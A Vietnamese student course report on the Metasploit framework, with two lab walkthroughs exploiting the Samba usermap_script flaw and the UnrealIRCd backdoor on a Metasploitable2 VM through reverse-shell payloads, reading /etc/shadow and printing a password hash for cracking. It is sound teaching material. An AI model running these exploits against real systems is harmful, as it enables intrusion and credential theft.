HỌC PHẦN: AN TOÀN MẠNG ĐỀ TÀI: CÔNG CỤ TẤN CÔNG METASPLOIT

35 16 0
HỌC PHẦN: AN TOÀN MẠNG  ĐỀ TÀI: CÔNG CỤ TẤN CÔNG METASPLOIT

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BỘ THƠNG TIN VÀ TRUYỀN THƠNG TẬP ĐỒN BƯU CHÍNH VIỄN THƠNG VIỆT NAM HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THÔNG HỌC PHẦN: AN TỒN MẠNG ĐỀ TÀI: CƠNG CỤ TẤN CÔNG METASPLOIT Giảng viên: TS.Đặng Minh Tuấn Sinh viên thực hiện: Ngô Thanh Hằng Mã sinh viên: B18DCAT074 Số điện thoại: 0347.495.703 Nhóm học phần: 01 Hà Nội, 2021 -1- MỤC LỤC MỤC LỤC - DANH SÁCH CÁC THUẬT NGỮ VIẾT TẮT VÀ TIẾNG ANH DANH MỤC HÌNH ẢNH LỜI MỞ ĐẦU CHƯƠNG 1: KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT 1.1 Lịch sử đời 1.2 Giới thiệu sơ lược Metasploit 1.3 Cấu trúc Metasploit Framework CHƯƠNG 2: HƯỚNG DẪN SỬ DỤNG 16 2.1 Metasploit Web Interface 16 2.2 Metasploit Console 17 2.2.1 Khởi động Metasploit 17 2.2.2 Các câu lệnh Metasploit 18 2.2.3 Quy trình kiểm thử Metasploit 21 CHƯƠNG 3: KỊCH BẢN VÀ DEMO TẤN CÔNG BACKDOOR SỬ DỤNG METASLOIT 23 3.1 Sơ lược backdoor (cửa hậu) công backdoor 23 3.1.1 Backdoor gì? 23 3.1.2 Các loại backdoor 23 3.1.3 Những thao tác kẻ công mở backdoor 23 3.2 LAB 1: Khai thác lỗi Samba cho phép mở shell chạy với quyền root 24 3.2.1 Kịch 24 3.2.2 Các bước thực demo 25 3.2.3 Video demo 29 3.3 LAB 2: Khai thác cửa hậu UnrealIRCd 30 3.3.1 Kịch 30 3.3.2 Các bước thực demo 31 -2- 3.3.3 Video demo 33 ĐÁNH GIÁ VÀ KẾT LUẬN .34 TÀI LIỆU THAM KHẢO .35 -3- DANH SÁCH CÁC THUẬT NGỮ VIẾT TẮT VÀ TIẾNG ANH Từ viết tắt RHOST Thuật ngữ tiếng Anh/giải thích Remote Host RPORT LHOST Remote Port Local Host LPORT Local Port Victim CVE SMB Victim Common Vulnerabilities and Exposures Server Message Block Nmap Network Mapper RAT Remote Access Trojan VNC Server Virtual Network Computing Server Thuật ngữ tiếng Việt/giải thích Địa từ xa – địa máy nạn nhân Cổng từ xa – cổng máy nạn nhân Địa cục - địa máy công Cổng cục - cổng máy công Máy nạn nhân chịu công Danh sách lỗi bảo mật máy tính cơng khai Giao thức chia sẻ file phổ biến HĐH Windows Tiện ích mã nguồn mở dùng để khai thác thông tin mạng kiểm tra bảo mật Một loại phần mềm độc hại cho phép tin tặc giám sát kiểm soát máy tính nạn nhân Cơng nghệ chia sẻ giao diện hình từ xa DANH MỤC HÌNH ẢNH Hình ảnh Cấu trúc Metasploit Framework Hình ảnh 2: Thư mục Data 10 Hình ảnh 3: Thư mục Documentation 10 Hình ảnh 4: Thư mục Lib 10 Hình ảnh 5: Thư mục Module 10 Hình ảnh 6:Thư mục Pugins 10 Hình ảnh 7: Thư mục Tools 11 Hình ảnh 8: Thư mục Scripts 11 Hình ảnh 9: Ví dụ sử dụng Payload 13 Hình ảnh 10: Ví dụ sử dụng Payload 14 Hình ảnh 11: Ví dụ sử dụng Payload 14 Hình ảnh 12: Ví dụ sử dụng Payload 14 Hình ảnh 13: Ví dụ sử dụng Payload 15 Hình ảnh 14: Giao diện Metasploit Web Interface 16 Hình ảnh 15: Khởi động metasploit với msfdb init Error! Bookmark not defined Hình ảnh 16: Giao diện khởi động Metasploit Console 18 Hình ảnh 17: Các câu lệnh Metasploit Framework 18 Hình ảnh 18: Các câu lệnh Metasploit Framework 19 Hình ảnh 19: Các câu lệnh Metasploit Framework 19 Hình ảnh 20: Câu lệnh cập nhật Metasploit 19 Hình ảnh 21: Câu lệnh Search 20 Hình ảnh 22: Ví dụ câu lệnh Search 20 Hình ảnh 23: Cấu hình máy Victim Metasploitable2 25 Hình ảnh 24: Tìm địa IPv4 máy victim 26 Hình ảnh 25: Kiểm tra kết nối Kali victim 26 Hình ảnh 26: Kiểm tra kết nối victim Kali 27 Hình ảnh 27: Quét lỗ hổng với module auxiliary 27 Hình ảnh 28: Cấu hình module auxiliary 27 Hình ảnh 29: Lệnh show options 28 Hình ảnh 30: Cấu hình module cơng 28 Hình ảnh 31: Tấn công 28 Hình ảnh 32: Kết công lab 29 Hình ảnh 33: Cấu hình máy victim Metasploitable 31 Hình ảnh 34: Tìm địa IPv4 máy victim 31 Hình ảnh 35: Kiểm tra kết nối Kali victim 32 Hình ảnh 36: Kiểm tra kết nối victim kali 32 Hình ảnh 37: Sử dụng nmap quét lỗ hổng victim 32 Hình ảnh 38: Chọn module cơng lab 33 Hình ảnh 39: Cấu hình module cơng lab 33 Hình ảnh 40: Tấn cơng lab kết 33 LỜI MỞ ĐẦU Với phát triển ngày nhanh công nghệ mạng lưới Internet tồn cầu, nhu cầu bảo mật thơng tin hệ thống hay ứng dụng ngày quan tâm có ý nghĩa quan trọng Vì thế, việc nghiên cứu hay phát lỗ hổng hệ thống công việc quan trọng Kali Linux hệ điều hành phát triển phù hợp cho công việc chuyên gia bảo mật Trong đó, metasploit tool phát cơng lỗ hổng tích hợp sẵn hệ điều hành Trong tiểu luận với đề tài “Công cụ công Metasploit”, tìm hiểu Metasploit cách cách thức mà sử dụng để cơng, đồng thời tiến hành thử nghiệm để kiểm chứng CHƯƠNG 1: KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT 1.1 Lịch sử đời Ra đời vào năm 2003 tác giả H.D.Moore – Metasploit Framework tên dự án bảo mật máy tính nhằm tổng hợp, cung cấp thơng tin lỗ hổng bảo mật, đồng thời hỗ trợ khai thác lỗ hổng Moore phát hành phiên Metasploit – Power Metasploit vào năm 2003, với 11 lần khai thác Với trợ giúp Spoon M, Moore viết lại phác thảo tổng thể dự án Metasploit 2.0 phát hành với 19 lần khai thác 27 payloads vào tháng năm 2004 Ngay sau lần phát hành này, Matt Miller tham gia vào nhóm phát triển Metasploit, dự án sau mở rộng ngày nhận nhiều ủng hộ từ cộng đồng bảo mật danh tiếng Sau viết lại hồn tồn ngơn ngữ lập trình Ruby, nhóm phát triển Metasploit phát hành phiên 3.0 vào năm 2007 Việc chuyển đổi framework từ ngôn ngữ cũ Perl sang Ruby 18 tháng kết 150.000 dịng mã nguồn hồn tồn Với phát hành 3.0, Metasploit chấp nhận rộng rãi cộng đồng an tồn thơng tin có gia tăng nhanh chóng số lượng người dùng Năm 2009, Metasploit Rapid7 – công ty chuyên bảo mật mua lại 1.2 Giới thiệu sơ lược Metasploit Metasploit Framework tập trung vào việc triển khai nhanh bước khai thác lỗ hổng bảo mật phát triển hệ thống phát xâm nhập Ban đầu viết tảng ngơn ngữ lập trình Perl với thành phần viết C Python, sau viết lại Ruby với giúp đỡ Matt Miller Spoon M Hiện nay, Metasploit Framework tiếp tục dự án mã nguồn mở có 200.000 người dùng cộng tác viên Trên Kali Linux, Metasploit Framework cài đặt mặc định, số hệ điều hành khác Windows, MacOS,…người dùng cần cài đặt thủ công Metasploit Framework có phiên phát hành: Metasploit Express, Metasploit Professional Metasploit Community 1.3 Cấu trúc Metasploit Framework Hình ảnh Cấu trúc Metasploit Framework DATA: Thư mục chứa tệp chỉnh sửa được, dùng để lưu trữ tệp nhị phân cần thiết cho hoạt động công định, danh sách từ ngữ, hình ảnh,… Hình ảnh 2: Thư mục Data DOCUMENTATION: Thư mục chứa tệp tài liệu có sẵn Metasploit Framework Hình ảnh 3: Thư mục Documentation LIB: Thư mục lib chứa mã nguồn sở Metasploit Hình ảnh 4: Thư mục Lib MODULES: Nơi chứa module thực tế Metasploit Framework dùng cho khai thác, chức phụ để kiểm tra khả công, module cho việc mã hóa Hình ảnh 5: Thư mục Module PLUGINS: Metasploit bao gồm nhiều plugins, đoạn chương trình nhỏ hỗ trọ trình sử dụng Metasploit Hình ảnh 6:Thư mục Pugins 10 2.2.3 Quy trình kiểm thử Metasploit Có hai hình thức sử dụng Metasploit Framework: Sử dụng module để dò quét công lỗ hổng bảo mật, tạo mã độc truyền mã vào máy nạn nhân, sau cách lừa nạn nhân kích hoạt mã độc Về bản, Metasploit sử dụng hệ quản trị sở liệu PostgreSQL để lưu trữ cấu hình, payload phục vụ cho nhiệm vụ khác trình kiểm thử Quá trình kiểm thử framework bao gồm bước sau: Bước 1: Phát hiện, xác định mục tiêu cần công thu thập thông tin mục tiêu Bước 2: Lựa chọn mục tiêu vừa tìm bước Dựa vào thơng tin mà Module Auxiliary vừa cung cấp, từ tìm kiếm lỗ hổng mã khai thác liên quan đến mục tiêu, sau xác thực lỗ hổng thực tồn mục tiêu Ở bước này, chủ yếu sử dụng Module auxiliary/scanner công cụ dị qt khác Nmap (được tích hợp sẵn) Bước 3: Lựa chọn module exploit: lựa chọn mã khai thác Metasploit hỗ trợ, sử dụng số câu lệnh sau: - search: tìm kiểm module liên quan đến mục tiêu cần kiểm thử show exploits: xem module exploit mà framework hỗ trợ use exploit_name: chọn module exploit infor exploit_name: xem thông tin module exploit Bước 4: Cấu hình module exploit chọn xác nhận option vừa cấu hình - show options: xác định options cần cấu hình set: cấu hình cho option module check: kiểm tra xem option set xác hay chưa Bước 5: Lựa chọn payload: payload đoạn code mà chạy hệ thống máy tính điều khiển từ xa, sử dụng lệnh sau để thực bước này: - show payloads: liệt kê payload module exploit info payload_name: xem thông tin chi tiết payload set payload payload_name: xác định payload name, sau lựa chọn payload nào, dùng lệnh show option để xem option payload show advanced: xem advanced option payload Bước 6: Thực thi exploit: 21 - exploit: lệnh dùng để thực thi payload, sau payload cung cấp cho người cơng thơng tin hệ thống khai thác Ngồi việc sử dụng module khai thác có sẵn, Metasploit Framework hỗ trợ mạnh mẽ cho việc người dùng tự tạo đoạn mã khai thác dựa API có sẵn 22 CHƯƠNG 3: KỊCH BẢN VÀ DEMO TẤN CÔNG BACKDOOR SỬ DỤNG METASLOIT 3.1 Sơ lược backdoor (cửa hậu) cơng backdoor 3.1.1 Backdoor gì? Backdoor hay cửa hậu phần mềm hệ thống máy tính thường cổng khơng cơng khai rộng rãi, cổng ẩn cho phép người quản trị xâm nhập hệ thống để tìm nguyên nhân gây lỗi bảo trì hệ thống Ngồi ra, thuật ngữ dùng để cổng bí mật hay chương trình gián điệp mà hacker để truy cập bất hợp pháp vào thiết bị người dùng bình thường 3.1.2 Các loại backdoor Thứ nhất, backdoor hợp pháp: loại cửa hậu điểm truy cập hợp pháp nhúng vào hệ thống hay phần mềm, cho phép quản trị từ xa Kiểu backdoor thường không thơng báo rộng rãi, đùng để bảo trì phần mềm/hệ thống Một số backdoor quản trị bảo vệ tên người dùng mật chèn cứng (hardcode) khơng thể thay đổi, số khác thay đổi Chỉ có chủ hệ thống hay chủ phần mềm biết tồn cửa hậu Tuy nhiên, backdoor quản trị tạo khả cho kẻ công khai thác, chiếm quyền điều khiển hệ thống Thứ hai, backdoor bất hợp pháp: kẻ công cài lên hệ thống nạn nhân, nhờ đó, họ truy cập tùy ý, cho phép điều khiển hệ thống từ xa Mã độc cài hệ thống gọi Trojan truy cập từ xa (RAT), dùng để cài malware máy đánh cắp liệu Backdoor loại cách để vượt qua hàng rào bảo mật để xâm nhập vào thiết bị phần mềm Sau cài đặt backdoor, cổng dịch vụ tự động mở cho phép kẻ công tạo backdoor kết nối từ xa tới phần mềm từ thực lệnh chúng cách dễ dàng 3.1.3 Những thao tác kẻ công mở backdoor Thơng qua backdoor, hacker khai thác thông tin người dùng (thông tin cá nhân, tài khoản, mật khẩu,…) Ngồi ra, chúng sử dụng backdoor để làm bàn đạp cài phần mềm độc hại khác vào thiết bị Ransomeware, Cryptojacking, Spyware,… 23 3.2 LAB 1: Khai thác lỗi Samba cho phép mở shell chạy với quyền root 3.2.1 Kịch - Các công cụ, tảng cần sử dụng: • Máy cơng: Kali Linux (có tích hợp Metasploit Framework) • Máy victim: Metasploitable2 (đây máy ảo Linux tạo với mục đích tạo mơi trường lỗ hổng để người dùng thực hành kiểm thử/tấn công) - Bước 1: Phát hiện, xác định mục tiêu cần công, thu thập thông tin: mục tiêu đặt victim Metasploitable2 - Bước 2: Chọn mục tiêu, quét máy victim tìm lỗ hổng tồn tại: • Tìm địa IP máy victim + Thực tìm địa IP victim lệnh: ifconfig • Kiểm tra kết nối mạng máy lệnh: ping + Từ máy victim, sử dụng lệnh: ping + Từ máy cơng, sử dụng lệnh: ping • Sử dụng cơng cụ nmap (tích hợp sẵn Kali Linux) để rà quét lỗ hổng tồn Metasploitable2 + Quét cổng dịch vụ netbios-ssn port 139: nmap –script vuln -p139 + Quét cổng dịch vụ microsoft-ds port 445: nmap –script vuln -p445 + Khai thác tìm phiên Samba hoạt động chuỗi lệnh: o Khởi động Metasploit o Khai báo sử dụng module công: msf > use auxiliary/scanner/smb/smb_version o Chạy lệnh show options để xem thông tin module công sử dụng o Đặt địa IP máy victim: msf > set RHOST o Thực thi công: msf > exploit  Máy victim liệt kê tên dịch vụ Samba phiên o Một số thông tin dịch vụ Samba – dịch vụ khai thác để công: Samba dịch vụ hệ điều hành Linux, chạy giao thức SMB (Server Message Block) cho phép chia sẻ file máy in với máy chạy Windows 24 Samba mô hệ thống Windows, cho phép hệ thống Unix/Linux gia nhập vào “Network Neighborhood” người dùng Windows truy cập tài nguyên Unix Lỗ hổng lựa chọn lỗ hổng bảo mật CVE-2007-2447 dịch vụ chia sẻ file SMB với phiên Samba 3.0.0 đến 3.0.25 cho phép thực thi mã từ xa - Bước 3&4: Lựa chọn cấu hình module exploit chọn + Khai báo sử dụng module công: msf > use exploit/multi/samba/usermap_script Chạy lệnh show options để xem thông tin module công sử dụng + Đặt địa IP máy victim: msf > set RHOST - Bước 5: Lựa chọn payload công: + Chọn payload thực thi: msf > set payload cmd/unix/reverse + Đặt 445 port truy cập máy victim msf > set RPORT 445 - Bước 6: Thực thi công: msf> exploit 3.2.2 Các bước thực demo Cấu hình máy victim Metasploitable2: Hình ảnh 22: Cấu hình máy Victim Metasploitable2 Đặt tên máy victim: AT074-NgoThanhHang Tài khoản người dùng: username: hangntAT074 – password: 2508Aa@ 25 Quét máy victim tìm lỗ hổng tồn tại: Hình ảnh 23: Tìm địa IPv4 máy victim IPv4 máy victim: 192.168.255.131 Kiểm tra kết nối hai máy lệnh ping: + Kali đến Metasploitable2 Hình ảnh 24: Kiểm tra kết nối Kali victim 26 + Metasploitable đến Kali Hình ảnh 25: Kiểm tra kết nối victim Kali Module auxiliary/scanner sử dụng; Hình ảnh 26: Quét lỗ hổng với module auxiliary Cấu hình module, set RHOST = 192.168.255.131, tìm phiên Samba mà máy victim sử dụng: Hình ảnh 27: Cấu hình module auxiliary Thực thi khai thác lỗi Samba cho phép mở shell chạy với quyền root: Chọn module exploit sử dụng exploit(multi/samba/usermap_script) 27 Hình ảnh 28: Lệnh show options Lệnh show options dùng để xem thông tin module sử dụng Cấu hình module cơng set payload (cmd/unix/reverse) Hình ảnh 29: Cấu hình module cơng Thực thi cơng lấy liệu từ máy victim: Hình ảnh 30: Tấn công 28 Exploit thành công, cửa hậu mở shell với người dùng root Metasploitable2 cho phép điều khiển từ xa từ máy cơng (Kali) Hình ảnh 31: Kết công lab Chạy lệnh đọc tên người dùng máy truy cập: whoami uname -a Với kết câu lệnh này, người công nhận thông tin giống thông tin thiết lập cho máy victim từ đầu Câu lệnh lấy tên mật tạo: cat /etc/shadow | grep hangntAT074 Kết nhận được: hangntAT074:$1$ZmIeRYvc$xmjoD.KfeOM5xkYC603Eq1: 18983:0:99999:7::: Sử dụng John The Ripper để crack mật nhận 3.2.3 Video demo Video demo thực link google drive sau: https://drive.google.com/file/d/1VRzSSgzzXPp414_Y7BlH1rv44o9OHSs0/view? usp=sharing 29 3.3 LAB 2: Khai thác cửa hậu UnrealIRCd 3.3.1 Kịch - Các công cụ, tảng cần sử dụng: + Máy cơng: Kali Linux tích hợp Metasploit Framework + Máy victim: Metasploitable - Bước 1: Phát hiện, xác định mục tiêu cần công, thu thập thông tin: mục tiêu đặt victim Metasploitable2 - Bước 2: Chọn mục tiêu, quét máy victim tìm lỗ hổng tồn tại: • Tìm địa IP máy victim + Thực tìm địa IP victim lệnh: ifconfig • Kiểm tra kết nối mạng máy lệnh: ping + Từ máy victim, sử dụng lệnh: ping + Từ máy công, sử dụng lệnh: ping • Sử dụng cơng cụ nmap (tích hợp sẵn Kali Linux) để rà quét lỗ hổng tồn Metasploitable2 Câu lệnh sử dụng: nmap -sC Cửa hậu khai thác lab cửa hậu tổn UnrealIRCd UnrealIRCd máy chủ nhắn tin hoạt động dựa giao thức IRC cổng TCP 6667 Công cụ tồn cửa hậu sau thời gian dài bị phát Backdoor mở nhận chuỗi ký tự “AB” kèm theo lệnh shell hệ điều hành - Bước 3&4: Lựa chọn cấu hình module exploit chọn + Khai báo sử dụng module công: msf > use exploit/unix/irc/unreal_ircd_3281_backdoor Chạy lệnh show options để xem thông tin module công sử dụng + Đặt địa IP máy victim: msf > set RHOST - Bước 5: Lựa chọn payload công: + Chọn payload thực thi: msf > set payload cmd/unix/reverse_perl - Bước 6: Thực thi công: msf> exploit 30 3.3.2 Các bước thực demo Cấu hình máy victim Metasploitable2: Hình ảnh 32: Cấu hình máy victim Metasploitable Đặt tên máy victim: AT074-NgoThanhHang Tài khoản người dùng: username: hangntAT074 – password: 2508Aa@ Quét máy victim tìm lỗ hổng tồn tại: Hình ảnh 33: Tìm địa IPv4 máy victim IPv4 máy victim: 192.168.255.131 Kiểm tra kết nối hai máy lệnh ping: + Kali đến Metasploitable2 31 Hình ảnh 34: Kiểm tra kết nối Kali victim + Metasploitable đến Kali Hình ảnh 35: Kiểm tra kết nối victim kali Sử dụng nmap Kali để rà quét lỗ hổng tồn máy victim Hình ảnh 36: Sử dụng nmap quét lỗ hổng victim Lỗ hổng Unreal tồn máy victim 32 Thực thi khai thác backdoor UnrealIRCd Sử dụng module exploit (unix/irc/unreal_ircd_3281_backdoor) Hình ảnh 37: Chọn module cơng lab Lệnh show options dùng để xem thông tin module sử dụng Cấu hình module cơng set payload (cmd/unix/reverse_perl) Hình ảnh 38: Cấu hình module công lab Tấn công lấy liệu từ máy victim Hình ảnh 39: Tấn cơng lab kết 3.3.3 Video demo Video demo thực link google drive sau: https://drive.google.com/file/d/1ZPcPH7McHhR9U4rHN0e9bCubGW1ol58 K/view?usp=sharing Hoặc link: https://youtu.be/c0Fh_oV9kD8 (nếu link bị lỗi ạ) 33 ĐÁNH GIÁ VÀ KẾT LUẬN Metasploit Framework công cụ kiểm thử mạnh mẽ, trợ thủ đắc lực chuyên gia an toàn bảo mật Bài báo cáo trình bày khái niệm tổng quát, cấu trúc thành phần Metasploit, từ có nhìn tổng qt bước cần phải thực muốn kiểm thử/tấn công sử dụng framework Rapid7 tiếp tục hoàn thiện phát triển công cụ chắn, Metasploit tiếp tục sử dụng rộng rãi tương lai, mà thời đại an toàn – bảo mật thông tin bùng nổ 34 TÀI LIỆU THAM KHẢO [1] Wikipedia, "Metasploit Project" [Online] Available: https://en.wikipedia.org/wiki/Metasploit_Project [2] "Metasploit - The Penetration Tester's Guide" by David Kennedy, Jim O'Gorman, Devon Kearnsand Mati Aharoni [3] "Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research" by David Maynor [4] VSkills "Backdoor" [Online] Available: https://www.vskills.in/certification/tutorial/backdoor/ [5] Phạm, Hoàng Duy "An Toàn Hệ Điều Hành", 2017 35 ... luận với đề tài ? ?Công cụ công Metasploit? ??, tìm hiểu Metasploit cách cách thức mà sử dụng để cơng, đồng thời tiến hành thử nghiệm để kiểm chứng CHƯƠNG 1: KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT 1.1 Lịch... cần cài đặt thủ công Metasploit Framework có phiên phát hành: Metasploit Express, Metasploit Professional Metasploit Community 1.3 Cấu trúc Metasploit Framework Hình ảnh Cấu trúc Metasploit Framework...MỤC LỤC MỤC LỤC - DANH SÁCH CÁC THUẬT NGỮ VIẾT TẮT VÀ TIẾNG ANH DANH MỤC HÌNH ẢNH LỜI MỞ ĐẦU CHƯƠNG 1: KHÁI QUÁT VỀ CÔNG CỤ METASPLOIT 1.1 Lịch sử đời

Ngày đăng: 09/02/2022, 13:25

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan